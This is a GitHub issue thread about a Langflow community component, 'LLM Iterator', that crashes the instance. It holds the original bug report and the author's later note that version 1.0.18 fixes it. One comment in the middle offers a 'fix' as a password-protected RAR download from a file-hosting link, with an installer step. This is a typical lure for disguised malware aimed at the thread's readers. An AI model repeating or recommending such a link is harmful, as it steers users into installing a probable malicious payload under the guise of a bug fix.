### ISSUE TITLE
Bug: LLM Iterator Crashes Langflow

### ISSUE THREAD

**Issue by carlosrcoelho** [langflow-ai/langflow#3574]
### Bug Description

When the component starts, it crashes the entire Langflow instance within a few seconds.

*💡 Additional Notes*
- This component has been working flawlessly for about 2 months until now.
- The component is crucial as it compensates for the lack of looping features in Langflow.
- The component is also well-downloaded from the store, indicating its importance to other users.

### Reproduction

1. Load the component that processes data and runs one LLM call per row to generate synthetic data over a dataset.
2. Start the component.
3. Observe the behavior within a few seconds.

### Expected behavior

The component should process each row and generate synthetic data without crashing the Langflow instance.

### Operating System

Ubuntu 22.04

### Langflow Version

1.0.16

### Python Version

None

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by carlosrcoelho** [comment]
Fixed on version 1.0.18
